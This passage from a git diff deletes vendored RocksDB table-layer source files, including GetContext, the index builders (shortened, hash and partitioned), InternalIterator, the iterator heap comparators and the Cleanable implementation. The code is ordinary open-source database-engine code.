-        ParsedInternalKey(user_key, kMaxSequenceNumber, type), value,
-        value_pinner);
-  }
-#else   // ROCKSDB_LITE
-  assert(false);
-#endif  // ROCKSDB_LITE
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/get_context.h b/thirdparty/rocksdb/table/get_context.h
deleted file mode 100644
index a708f6b..0000000
--- a/thirdparty/rocksdb/table/get_context.h
+++ /dev/null
@@ -1,95 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <string>
-#include "db/merge_context.h"
-#include "db/range_del_aggregator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/types.h"
-#include "table/block.h"
-
-namespace rocksdb {
-class MergeContext;
-class PinnedIteratorsManager;
-
-class GetContext {
- public:
-  enum GetState {
-    kNotFound,
-    kFound,
-    kDeleted,
-    kCorrupt,
-    kMerge,  // saver contains the current merge result (the operands)
-    kBlobIndex,
-  };
-
-  GetContext(const Comparator* ucmp, const MergeOperator* merge_operator,
-             Logger* logger, Statistics* statistics, GetState init_state,
-             const Slice& user_key, PinnableSlice* value, bool* value_found,
-             MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-             Env* env, SequenceNumber* seq = nullptr,
-             PinnedIteratorsManager* _pinned_iters_mgr = nullptr,
-             bool* is_blob_index = nullptr);
-
-  void MarkKeyMayExist();
-
-  // Records this key, value, and any meta-data (such as sequence number and
-  // state) into this GetContext.
-  //
-  // Returns True if more keys need to be read (due to merges) or
-  //         False if the complete value has been found.
-  bool SaveValue(const ParsedInternalKey& parsed_key, const Slice& value,
-                 Cleanable* value_pinner = nullptr);
-
-  // Simplified version of the previous function. Should only be used when we
-  // know that the operation is a Put.
-  void SaveValue(const Slice& value, SequenceNumber seq);
-
-  GetState State() const { return state_; }
-
-  RangeDelAggregator* range_del_agg() { return range_del_agg_; }
-
-  PinnedIteratorsManager* pinned_iters_mgr() { return pinned_iters_mgr_; }
-
-  // If a non-null string is passed, all the SaveValue calls will be
-  // logged into the string. The operations can then be replayed on
-  // another GetContext with replayGetContextLog.
-  void SetReplayLog(std::string* replay_log) { replay_log_ = replay_log; }
-
-  // Do we need to fetch the SequenceNumber for this key?
-  bool NeedToReadSequence() const { return (seq_ != nullptr); }
-
-  bool sample() const { return sample_; }
-
- private:
-  const Comparator* ucmp_;
-  const MergeOperator* merge_operator_;
-  // the merge operations encountered;
-  Logger* logger_;
-  Statistics* statistics_;
-
-  GetState state_;
-  Slice user_key_;
-  PinnableSlice* pinnable_val_;
-  bool* value_found_;  // Is value set correctly? Used by KeyMayExist
-  MergeContext* merge_context_;
-  RangeDelAggregator* range_del_agg_;
-  Env* env_;
-  // If a key is found, seq_ will be set to the SequenceNumber of most recent
-  // write to the key or kMaxSequenceNumber if unknown
-  SequenceNumber* seq_;
-  std::string* replay_log_;
-  // Used to temporarily pin blocks when state_ == GetContext::kMerge
-  PinnedIteratorsManager* pinned_iters_mgr_;
-  bool sample_;
-  bool* is_blob_index_;
-};
-
-void replayGetContextLog(const Slice& replay_log, const Slice& user_key,
-                         GetContext* get_context,
-                         Cleanable* value_pinner = nullptr);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/index_builder.cc b/thirdparty/rocksdb/table/index_builder.cc
deleted file mode 100644
index cdf20ae..0000000
--- a/thirdparty/rocksdb/table/index_builder.cc
+++ /dev/null
@@ -1,187 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/index_builder.h"
-#include <assert.h>
-#include <inttypes.h>
-
-#include <list>
-#include <string>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/flush_block_policy.h"
-#include "table/format.h"
-#include "table/partitioned_filter_block.h"
-
-// Without anonymous namespace here, we fail the warning -Wmissing-prototypes
-namespace rocksdb {
-// using namespace rocksdb;
-// Create a index builder based on its type.
-IndexBuilder* IndexBuilder::CreateIndexBuilder(
-    BlockBasedTableOptions::IndexType index_type,
-    const InternalKeyComparator* comparator,
-    const InternalKeySliceTransform* int_key_slice_transform,
-    const BlockBasedTableOptions& table_opt) {
-  switch (index_type) {
-    case BlockBasedTableOptions::kBinarySearch: {
-      return new ShortenedIndexBuilder(comparator,
-                                       table_opt.index_block_restart_interval);
-    }
-    case BlockBasedTableOptions::kHashSearch: {
-      return new HashIndexBuilder(comparator, int_key_slice_transform,
-                                  table_opt.index_block_restart_interval);
-    }
-    case BlockBasedTableOptions::kTwoLevelIndexSearch: {
-      return PartitionedIndexBuilder::CreateIndexBuilder(comparator, table_opt);
-    }
-    default: {
-      assert(!"Do not recognize the index type ");
-      return nullptr;
-    }
-  }
-  // impossible.
-  assert(false);
-  return nullptr;
-}
-
-PartitionedIndexBuilder* PartitionedIndexBuilder::CreateIndexBuilder(
-    const InternalKeyComparator* comparator,
-    const BlockBasedTableOptions& table_opt) {
-  return new PartitionedIndexBuilder(comparator, table_opt);
-}
-
-PartitionedIndexBuilder::PartitionedIndexBuilder(
-    const InternalKeyComparator* comparator,
-    const BlockBasedTableOptions& table_opt)
-    : IndexBuilder(comparator),
-      index_block_builder_(table_opt.index_block_restart_interval),
-      sub_index_builder_(nullptr),
-      table_opt_(table_opt) {}
-
-PartitionedIndexBuilder::~PartitionedIndexBuilder() {
-  delete sub_index_builder_;
-}
-
-void PartitionedIndexBuilder::MakeNewSubIndexBuilder() {
-  assert(sub_index_builder_ == nullptr);
-  sub_index_builder_ = new ShortenedIndexBuilder(
-      comparator_, table_opt_.index_block_restart_interval);
-  flush_policy_.reset(FlushBlockBySizePolicyFactory::NewFlushBlockPolicy(
-      table_opt_.metadata_block_size, table_opt_.block_size_deviation,
-      sub_index_builder_->index_block_builder_));
-  partition_cut_requested_ = false;
-}
-
-void PartitionedIndexBuilder::RequestPartitionCut() {
-  partition_cut_requested_ = true;
-}
-
-void PartitionedIndexBuilder::AddIndexEntry(
-    std::string* last_key_in_current_block,
-    const Slice* first_key_in_next_block, const BlockHandle& block_handle) {
-  // Note: to avoid two consecuitive flush in the same method call, we do not
-  // check flush policy when adding the last key
-  if (UNLIKELY(first_key_in_next_block == nullptr)) {  // no more keys
-    if (sub_index_builder_ == nullptr) {
-      MakeNewSubIndexBuilder();
-    }
-    sub_index_builder_->AddIndexEntry(last_key_in_current_block,
-                                      first_key_in_next_block, block_handle);
-    sub_index_last_key_ = std::string(*last_key_in_current_block);
-    entries_.push_back(
-        {sub_index_last_key_,
-         std::unique_ptr<ShortenedIndexBuilder>(sub_index_builder_)});
-    sub_index_builder_ = nullptr;
-    cut_filter_block = true;
-  } else {
-    // apply flush policy only to non-empty sub_index_builder_
-    if (sub_index_builder_ != nullptr) {
-      std::string handle_encoding;
-      block_handle.EncodeTo(&handle_encoding);
-      bool do_flush =
-          partition_cut_requested_ ||
-          flush_policy_->Update(*last_key_in_current_block, handle_encoding);
-      if (do_flush) {
-        entries_.push_back(
-            {sub_index_last_key_,
-             std::unique_ptr<ShortenedIndexBuilder>(sub_index_builder_)});
-        cut_filter_block = true;
-        sub_index_builder_ = nullptr;
-      }
-    }
-    if (sub_index_builder_ == nullptr) {
-      MakeNewSubIndexBuilder();
-    }
-    sub_index_builder_->AddIndexEntry(last_key_in_current_block,
-                                      first_key_in_next_block, block_handle);
-    sub_index_last_key_ = std::string(*last_key_in_current_block);
-  }
-}
-
-Status PartitionedIndexBuilder::Finish(
-    IndexBlocks* index_blocks, const BlockHandle& last_partition_block_handle) {
-  assert(!entries_.empty());
-  // It must be set to null after last key is added
-  assert(sub_index_builder_ == nullptr);
-  if (finishing_indexes == true) {
-    Entry& last_entry = entries_.front();
-    std::string handle_encoding;
-    last_partition_block_handle.EncodeTo(&handle_encoding);
-    index_block_builder_.Add(last_entry.key, handle_encoding);
-    entries_.pop_front();
-  }
-  // If there is no sub_index left, then return the 2nd level index.
-  if (UNLIKELY(entries_.empty())) {
-    index_blocks->index_block_contents = index_block_builder_.Finish();
-    return Status::OK();
-  } else {
-    // Finish the next partition index in line and Incomplete() to indicate we
-    // expect more calls to Finish
-    Entry& entry = entries_.front();
-    auto s = entry.value->Finish(index_blocks);
-    finishing_indexes = true;
-    return s.ok() ? Status::Incomplete() : s;
-  }
-}
-
-// Estimate size excluding the top-level index
-// It is assumed that this method is called before writing index partition
-// starts
-size_t PartitionedIndexBuilder::EstimatedSize() const {
-  size_t total = 0;
-  for (auto it = entries_.begin(); it != entries_.end(); ++it) {
-    total += it->value->EstimatedSize();
-  }
-  total +=
-      sub_index_builder_ == nullptr ? 0 : sub_index_builder_->EstimatedSize();
-  return total;
-}
-
-// Since when this method is called we do not know the index block offsets yet,
-// the top-level index does not exist. Hence we estimate the block offsets and
-// create a temporary top-level index.
-size_t PartitionedIndexBuilder::EstimateTopLevelIndexSize(
-    uint64_t offset) const {
-  BlockBuilder tmp_builder(
-      table_opt_.index_block_restart_interval);  // tmp top-level index builder
-  for (auto it = entries_.begin(); it != entries_.end(); ++it) {
-    std::string tmp_handle_encoding;
-    uint64_t size = it->value->EstimatedSize();
-    BlockHandle tmp_block_handle(offset, size);
-    tmp_block_handle.EncodeTo(&tmp_handle_encoding);
-    tmp_builder.Add(it->key, tmp_handle_encoding);
-    offset += size;
-  }
-  return tmp_builder.CurrentSizeEstimate();
-}
-
-size_t PartitionedIndexBuilder::NumPartitions() const {
-  return entries_.size();
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/index_builder.h b/thirdparty/rocksdb/table/index_builder.h
deleted file mode 100644
index d591e0e..0000000
--- a/thirdparty/rocksdb/table/index_builder.h
+++ /dev/null
@@ -1,342 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <assert.h>
-#include <inttypes.h>
-
-#include <list>
-#include <string>
-#include <unordered_map>
-
-#include "rocksdb/comparator.h"
-#include "table/block_based_table_factory.h"
-#include "table/block_builder.h"
-#include "table/format.h"
-
-namespace rocksdb {
-// The interface for building index.
-// Instruction for adding a new concrete IndexBuilder:
-//  1. Create a subclass instantiated from IndexBuilder.
-//  2. Add a new entry associated with that subclass in TableOptions::IndexType.
-//  3. Add a create function for the new subclass in CreateIndexBuilder.
-// Note: we can devise more advanced design to simplify the process for adding
-// new subclass, which will, on the other hand, increase the code complexity and
-// catch unwanted attention from readers. Given that we won't add/change
-// indexes frequently, it makes sense to just embrace a more straightforward
-// design that just works.
-class IndexBuilder {
- public:
-  static IndexBuilder* CreateIndexBuilder(
-      BlockBasedTableOptions::IndexType index_type,
-      const rocksdb::InternalKeyComparator* comparator,
-      const InternalKeySliceTransform* int_key_slice_transform,
-      const BlockBasedTableOptions& table_opt);
-
-  // Index builder will construct a set of blocks which contain:
-  //  1. One primary index block.
-  //  2. (Optional) a set of metablocks that contains the metadata of the
-  //     primary index.
-  struct IndexBlocks {
-    Slice index_block_contents;
-    std::unordered_map<std::string, Slice> meta_blocks;
-  };
-  explicit IndexBuilder(const InternalKeyComparator* comparator)
-      : comparator_(comparator) {}
-
-  virtual ~IndexBuilder() {}
-
-  // Add a new index entry to index block.
-  // To allow further optimization, we provide `last_key_in_current_block` and
-  // `first_key_in_next_block`, based on which the specific implementation can
-  // determine the best index key to be used for the index block.
-  // @last_key_in_current_block: this parameter maybe overridden with the value
-  //                             "substitute key".
-  // @first_key_in_next_block: it will be nullptr if the entry being added is
-  //                           the last one in the table
-  //
-  // REQUIRES: Finish() has not yet been called.
-  virtual void AddIndexEntry(std::string* last_key_in_current_block,
-                             const Slice* first_key_in_next_block,
-                             const BlockHandle& block_handle) = 0;
-
-  // This method will be called whenever a key is added. The subclasses may
-  // override OnKeyAdded() if they need to collect additional information.
-  virtual void OnKeyAdded(const Slice& key) {}
-
-  // Inform the index builder that all entries has been written. Block builder
-  // may therefore perform any operation required for block finalization.
-  //
-  // REQUIRES: Finish() has not yet been called.
-  inline Status Finish(IndexBlocks* index_blocks) {
-    // Throw away the changes to last_partition_block_handle. It has no effect
-    // on the first call to Finish anyway.
-    BlockHandle last_partition_block_handle;
-    return Finish(index_blocks, last_partition_block_handle);
-  }
-
-  // This override of Finish can be utilized to build the 2nd level index in
-  // PartitionIndexBuilder.
-  //
-  // index_blocks will be filled with the resulting index data. If the return
-  // value is Status::InComplete() then it means that the index is partitioned
-  // and the callee should keep calling Finish until Status::OK() is returned.
-  // In that case, last_partition_block_handle is pointer to the block written
-  // with the result of the last call to Finish. This can be utilized to build
-  // the second level index pointing to each block of partitioned indexes. The
-  // last call to Finish() that returns Status::OK() populates index_blocks with
-  // the 2nd level index content.
-  virtual Status Finish(IndexBlocks* index_blocks,
-                        const BlockHandle& last_partition_block_handle) = 0;
-
-  // Get the estimated size for index block.
-  virtual size_t EstimatedSize() const = 0;
-
- protected:
-  const InternalKeyComparator* comparator_;
-};
-
-// This index builder builds space-efficient index block.
-//
-// Optimizations:
-//  1. Made block's `block_restart_interval` to be 1, which will avoid linear
-//     search when doing index lookup (can be disabled by setting
-//     index_block_restart_interval).
-//  2. Shorten the key length for index block. Other than honestly using the
-//     last key in the data block as the index key, we instead find a shortest
-//     substitute key that serves the same function.
-class ShortenedIndexBuilder : public IndexBuilder {
- public:
-  explicit ShortenedIndexBuilder(const InternalKeyComparator* comparator,
-                                 int index_block_restart_interval)
-      : IndexBuilder(comparator),
-        index_block_builder_(index_block_restart_interval) {}
-
-  virtual void AddIndexEntry(std::string* last_key_in_current_block,
-                             const Slice* first_key_in_next_block,
-                             const BlockHandle& block_handle) override {
-    if (first_key_in_next_block != nullptr) {
-      comparator_->FindShortestSeparator(last_key_in_current_block,
-                                         *first_key_in_next_block);
-    } else {
-      comparator_->FindShortSuccessor(last_key_in_current_block);
-    }
-
-    std::string handle_encoding;
-    block_handle.EncodeTo(&handle_encoding);
-    index_block_builder_.Add(*last_key_in_current_block, handle_encoding);
-  }
-
-  using IndexBuilder::Finish;
-  virtual Status Finish(
-      IndexBlocks* index_blocks,
-      const BlockHandle& last_partition_block_handle) override {
-    index_blocks->index_block_contents = index_block_builder_.Finish();
-    return Status::OK();
-  }
-
-  virtual size_t EstimatedSize() const override {
-    return index_block_builder_.CurrentSizeEstimate();
-  }
-
-  friend class PartitionedIndexBuilder;
-
- private:
-  BlockBuilder index_block_builder_;
-};
-
-// HashIndexBuilder contains a binary-searchable primary index and the
-// metadata for secondary hash index construction.
-// The metadata for hash index consists two parts:
-//  - a metablock that compactly contains a sequence of prefixes. All prefixes
-//    are stored consectively without any metadata (like, prefix sizes) being
-//    stored, which is kept in the other metablock.
-//  - a metablock contains the metadata of the prefixes, including prefix size,
-//    restart index and number of block it spans. The format looks like:
-//
-// +-----------------+---------------------------+---------------------+
-// <=prefix 1
-// | length: 4 bytes | restart interval: 4 bytes | num-blocks: 4 bytes |
-// +-----------------+---------------------------+---------------------+
-// <=prefix 2
-// | length: 4 bytes | restart interval: 4 bytes | num-blocks: 4 bytes |
-// +-----------------+---------------------------+---------------------+
-// |                                                                   |
-// | ....                                                              |
-// |                                                                   |
-// +-----------------+---------------------------+---------------------+
-// <=prefix n
-// | length: 4 bytes | restart interval: 4 bytes | num-blocks: 4 bytes |
-// +-----------------+---------------------------+---------------------+
-//
-// The reason of separating these two metablocks is to enable the efficiently
-// reuse the first metablock during hash index construction without unnecessary
-// data copy or small heap allocations for prefixes.
-class HashIndexBuilder : public IndexBuilder {
- public:
-  explicit HashIndexBuilder(const InternalKeyComparator* comparator,
-                            const SliceTransform* hash_key_extractor,
-                            int index_block_restart_interval)
-      : IndexBuilder(comparator),
-        primary_index_builder_(comparator, index_block_restart_interval),
-        hash_key_extractor_(hash_key_extractor) {}
-
-  virtual void AddIndexEntry(std::string* last_key_in_current_block,
-                             const Slice* first_key_in_next_block,
-                             const BlockHandle& block_handle) override {
-    ++current_restart_index_;
-    primary_index_builder_.AddIndexEntry(last_key_in_current_block,
-                                         first_key_in_next_block, block_handle);
-  }
-
-  virtual void OnKeyAdded(const Slice& key) override {
-    auto key_prefix = hash_key_extractor_->Transform(key);
-    bool is_first_entry = pending_block_num_ == 0;
-
-    // Keys may share the prefix
-    if (is_first_entry || pending_entry_prefix_ != key_prefix) {
-      if (!is_first_entry) {
-        FlushPendingPrefix();
-      }
-
-      // need a hard copy otherwise the underlying data changes all the time.
-      // TODO(kailiu) ToString() is expensive. We may speed up can avoid data
-      // copy.
-      pending_entry_prefix_ = key_prefix.ToString();
-      pending_block_num_ = 1;
-      pending_entry_index_ = static_cast<uint32_t>(current_restart_index_);
-    } else {
-      // entry number increments when keys share the prefix reside in
-      // different data blocks.
-      auto last_restart_index = pending_entry_index_ + pending_block_num_ - 1;
-      assert(last_restart_index <= current_restart_index_);
-      if (last_restart_index != current_restart_index_) {
-        ++pending_block_num_;
-      }
-    }
-  }
-
-  virtual Status Finish(
-      IndexBlocks* index_blocks,
-      const BlockHandle& last_partition_block_handle) override {
-    FlushPendingPrefix();
-    primary_index_builder_.Finish(index_blocks, last_partition_block_handle);
-    index_blocks->meta_blocks.insert(
-        {kHashIndexPrefixesBlock.c_str(), prefix_block_});
-    index_blocks->meta_blocks.insert(
-        {kHashIndexPrefixesMetadataBlock.c_str(), prefix_meta_block_});
-    return Status::OK();
-  }
-
-  virtual size_t EstimatedSize() const override {
-    return primary_index_builder_.EstimatedSize() + prefix_block_.size() +
-           prefix_meta_block_.size();
-  }
-
- private:
-  void FlushPendingPrefix() {
-    prefix_block_.append(pending_entry_prefix_.data(),
-                         pending_entry_prefix_.size());
-    PutVarint32Varint32Varint32(
-        &prefix_meta_block_,
-        static_cast<uint32_t>(pending_entry_prefix_.size()),
-        pending_entry_index_, pending_block_num_);
-  }
-
-  ShortenedIndexBuilder primary_index_builder_;
-  const SliceTransform* hash_key_extractor_;
-
-  // stores a sequence of prefixes
-  std::string prefix_block_;
-  // stores the metadata of prefixes
-  std::string prefix_meta_block_;
-
-  // The following 3 variables keeps unflushed prefix and its metadata.
-  // The details of block_num and entry_index can be found in
-  // "block_hash_index.{h,cc}"
-  uint32_t pending_block_num_ = 0;
-  uint32_t pending_entry_index_ = 0;
-  std::string pending_entry_prefix_;
-
-  uint64_t current_restart_index_ = 0;
-};
-
-/**
- * IndexBuilder for two-level indexing. Internally it creates a new index for
- * each partition and Finish then in order when Finish is called on it
- * continiously until Status::OK() is returned.
- *
- * The format on the disk would be I I I I I I IP where I is block containing a
- * partition of indexes built using ShortenedIndexBuilder and IP is a block
- * containing a secondary index on the partitions, built using
- * ShortenedIndexBuilder.
- */
-class PartitionedIndexBuilder : public IndexBuilder {
- public:
-  static PartitionedIndexBuilder* CreateIndexBuilder(
-      const rocksdb::InternalKeyComparator* comparator,
-      const BlockBasedTableOptions& table_opt);
-
-  explicit PartitionedIndexBuilder(const InternalKeyComparator* comparator,
-                                   const BlockBasedTableOptions& table_opt);
-
-  virtual ~PartitionedIndexBuilder();
-
-  virtual void AddIndexEntry(std::string* last_key_in_current_block,
-                             const Slice* first_key_in_next_block,
-                             const BlockHandle& block_handle) override;
-
-  virtual Status Finish(
-      IndexBlocks* index_blocks,
-      const BlockHandle& last_partition_block_handle) override;
-
-  virtual size_t EstimatedSize() const override;
-  size_t EstimateTopLevelIndexSize(uint64_t) const;
-  size_t NumPartitions() const;
-
-  inline bool ShouldCutFilterBlock() {
-    // Current policy is to align the partitions of index and filters
-    if (cut_filter_block) {
-      cut_filter_block = false;
-      return true;
-    }
-    return false;
-  }
-
-  std::string& GetPartitionKey() { return sub_index_last_key_; }
-
-  // Called when an external entity (such as filter partition builder) request
-  // cutting the next partition
-  void RequestPartitionCut();
-
- private:
-  void MakeNewSubIndexBuilder();
-
-  struct Entry {
-    std::string key;
-    std::unique_ptr<ShortenedIndexBuilder> value;
-  };
-  std::list<Entry> entries_;  // list of partitioned indexes and their keys
-  BlockBuilder index_block_builder_;  // top-level index builder
-  // the active partition index builder
-  ShortenedIndexBuilder* sub_index_builder_;
-  // the last key in the active partition index builder
-  std::string sub_index_last_key_;
-  std::unique_ptr<FlushBlockPolicy> flush_policy_;
-  // true if Finish is called once but not complete yet.
-  bool finishing_indexes = false;
-  const BlockBasedTableOptions& table_opt_;
-  // true if an external entity (such as filter partition builder) request
-  // cutting the next partition
-  bool partition_cut_requested_ = true;
-  // true if it should cut the next filter partition block
-  bool cut_filter_block = false;
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/internal_iterator.h b/thirdparty/rocksdb/table/internal_iterator.h
deleted file mode 100644
index 2bfdb7d..0000000
--- a/thirdparty/rocksdb/table/internal_iterator.h
+++ /dev/null
@@ -1,121 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#pragma once
-
-#include <string>
-#include "rocksdb/comparator.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class PinnedIteratorsManager;
-
-class InternalIterator : public Cleanable {
- public:
-  InternalIterator() {}
-  virtual ~InternalIterator() {}
-
-  // An iterator is either positioned at a key/value pair, or
-  // not valid.  This method returns true iff the iterator is valid.
-  virtual bool Valid() const = 0;
-
-  // Position at the first key in the source.  The iterator is Valid()
-  // after this call iff the source is not empty.
-  virtual void SeekToFirst() = 0;
-
-  // Position at the last key in the source.  The iterator is
-  // Valid() after this call iff the source is not empty.
-  virtual void SeekToLast() = 0;
-
-  // Position at the first key in the source that at or past target
-  // The iterator is Valid() after this call iff the source contains
-  // an entry that comes at or past target.
-  virtual void Seek(const Slice& target) = 0;
-
-  // Position at the first key in the source that at or before target
-  // The iterator is Valid() after this call iff the source contains
-  // an entry that comes at or before target.
-  virtual void SeekForPrev(const Slice& target) = 0;
-
-  // Moves to the next entry in the source.  After this call, Valid() is
-  // true iff the iterator was not positioned at the last entry in the source.
-  // REQUIRES: Valid()
-  virtual void Next() = 0;
-
-  // Moves to the previous entry in the source.  After this call, Valid() is
-  // true iff the iterator was not positioned at the first entry in source.
-  // REQUIRES: Valid()
-  virtual void Prev() = 0;
-
-  // Return the key for the current entry.  The underlying storage for
-  // the returned slice is valid only until the next modification of
-  // the iterator.
-  // REQUIRES: Valid()
-  virtual Slice key() const = 0;
-
-  // Return the value for the current entry.  The underlying storage for
-  // the returned slice is valid only until the next modification of
-  // the iterator.
-  // REQUIRES: !AtEnd() && !AtStart()
-  virtual Slice value() const = 0;
-
-  // If an error has occurred, return it.  Else return an ok status.
-  // If non-blocking IO is requested and this operation cannot be
-  // satisfied without doing some IO, then this returns Status::Incomplete().
-  virtual Status status() const = 0;
-
-  // Pass the PinnedIteratorsManager to the Iterator, most Iterators dont
-  // communicate with PinnedIteratorsManager so default implementation is no-op
-  // but for Iterators that need to communicate with PinnedIteratorsManager
-  // they will implement this function and use the passed pointer to communicate
-  // with PinnedIteratorsManager.
-  virtual void SetPinnedItersMgr(PinnedIteratorsManager* pinned_iters_mgr) {}
-
-  // If true, this means that the Slice returned by key() is valid as long as
-  // PinnedIteratorsManager::ReleasePinnedData is not called and the
-  // Iterator is not deleted.
-  //
-  // IsKeyPinned() is guaranteed to always return true if
-  //  - Iterator is created with ReadOptions::pin_data = true
-  //  - DB tables were created with BlockBasedTableOptions::use_delta_encoding
-  //    set to false.
-  virtual bool IsKeyPinned() const { return false; }
-
-  // If true, this means that the Slice returned by value() is valid as long as
-  // PinnedIteratorsManager::ReleasePinnedData is not called and the
-  // Iterator is not deleted.
-  virtual bool IsValuePinned() const { return false; }
-
-  virtual Status GetProperty(std::string prop_name, std::string* prop) {
-    return Status::NotSupported("");
-  }
-
- protected:
-  void SeekForPrevImpl(const Slice& target, const Comparator* cmp) {
-    Seek(target);
-    if (!Valid()) {
-      SeekToLast();
-    }
-    while (Valid() && cmp->Compare(target, key()) < 0) {
-      Prev();
-    }
-  }
-
- private:
-  // No copying allowed
-  InternalIterator(const InternalIterator&) = delete;
-  InternalIterator& operator=(const InternalIterator&) = delete;
-};
-
-// Return an empty iterator (yields nothing).
-extern InternalIterator* NewEmptyInternalIterator();
-
-// Return an empty iterator with the specified status.
-extern InternalIterator* NewErrorInternalIterator(const Status& status);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/iter_heap.h b/thirdparty/rocksdb/table/iter_heap.h
deleted file mode 100644
index 74c06ca..0000000
--- a/thirdparty/rocksdb/table/iter_heap.h
+++ /dev/null
@@ -1,42 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#pragma once
-
-#include "rocksdb/comparator.h"
-#include "table/iterator_wrapper.h"
-
-namespace rocksdb {
-
-// When used with std::priority_queue, this comparison functor puts the
-// iterator with the max/largest key on top.
-class MaxIteratorComparator {
- public:
-  MaxIteratorComparator(const Comparator* comparator) :
-    comparator_(comparator) {}
-
-  bool operator()(IteratorWrapper* a, IteratorWrapper* b) const {
-    return comparator_->Compare(a->key(), b->key()) < 0;
-  }
- private:
-  const Comparator* comparator_;
-};
-
-// When used with std::priority_queue, this comparison functor puts the
-// iterator with the min/smallest key on top.
-class MinIteratorComparator {
- public:
-  MinIteratorComparator(const Comparator* comparator) :
-    comparator_(comparator) {}
-
-  bool operator()(IteratorWrapper* a, IteratorWrapper* b) const {
-    return comparator_->Compare(a->key(), b->key()) > 0;
-  }
- private:
-  const Comparator* comparator_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/iterator.cc b/thirdparty/rocksdb/table/iterator.cc
deleted file mode 100644
index ed6a2cd..0000000
--- a/thirdparty/rocksdb/table/iterator.cc
+++ /dev/null
@@ -1,193 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/iterator.h"
-#include "table/internal_iterator.h"
-#include "table/iterator_wrapper.h"
-#include "util/arena.h"
-
-namespace rocksdb {
-
-Cleanable::Cleanable() {
-  cleanup_.function = nullptr;
-  cleanup_.next = nullptr;
-}
-
-Cleanable::~Cleanable() { DoCleanup(); }
-
-Cleanable::Cleanable(Cleanable&& other) {
-  *this = std::move(other);
-}
-
-Cleanable& Cleanable::operator=(Cleanable&& other) {
-  if (this != &other) {
-    cleanup_ = other.cleanup_;
-    other.cleanup_.function = nullptr;
-    other.cleanup_.next = nullptr;
-  }
-  return *this;
-}
-
-// If the entire linked list was on heap we could have simply add attach one
-// link list to another. However the head is an embeded object to avoid the cost
-// of creating objects for most of the use cases when the Cleanable has only one
-// Cleanup to do. We could put evernything on heap if benchmarks show no
-// negative impact on performance.
-// Also we need to iterate on the linked list since there is no pointer to the
-// tail. We can add the tail pointer but maintainin it might negatively impact
-// the perforamnce for the common case of one cleanup where tail pointer is not
-// needed. Again benchmarks could clarify that.
-// Even without a tail pointer we could iterate on the list, find the tail, and
-// have only that node updated without the need to insert the Cleanups one by
-// one. This however would be redundant when the source Cleanable has one or a
-// few Cleanups which is the case most of the time.
-// TODO(myabandeh): if the list is too long we should maintain a tail pointer
-// and have the entire list (minus the head that has to be inserted separately)
-// merged with the target linked list at once.
-void Cleanable::DelegateCleanupsTo(Cleanable* other) {
-  assert(other != nullptr);
-  if (cleanup_.function == nullptr) {
-    return;
-  }
-  Cleanup* c = &cleanup_;
-  other->RegisterCleanup(c->function, c->arg1, c->arg2);
-  c = c->next;
-  while (c != nullptr) {
-    Cleanup* next = c->next;
-    other->RegisterCleanup(c);
-    c = next;
-  }
-  cleanup_.function = nullptr;
-  cleanup_.next = nullptr;
-}
-
-void Cleanable::RegisterCleanup(Cleanable::Cleanup* c) {
-  assert(c != nullptr);
-  if (cleanup_.function == nullptr) {
-    cleanup_.function = c->function;
-    cleanup_.arg1 = c->arg1;
-    cleanup_.arg2 = c->arg2;
-    delete c;
-  } else {
-    c->next = cleanup_.next;
-    cleanup_.next = c;
-  }
-}
-
-void Cleanable::RegisterCleanup(CleanupFunction func, void* arg1, void* arg2) {
-  assert(func != nullptr);
-  Cleanup* c;
-  if (cleanup_.function == nullptr) {
-    c = &cleanup_;
-  } else {
-    c = new Cleanup;
-    c->next = cleanup_.next;
-    cleanup_.next = c;
-  }
-  c->function = func;
-  c->arg1 = arg1;
-  c->arg2 = arg2;
-}
-
-Status Iterator::GetProperty(std::string prop_name, std::string* prop) {
-  if (prop == nullptr) {
-    return Status::InvalidArgument("prop is nullptr");
-  }
-  if (prop_name == "rocksdb.iterator.is-key-pinned") {
-    *prop = "0";
-    return Status::OK();
-  }
-  return Status::InvalidArgument("Undentified property.");
-}
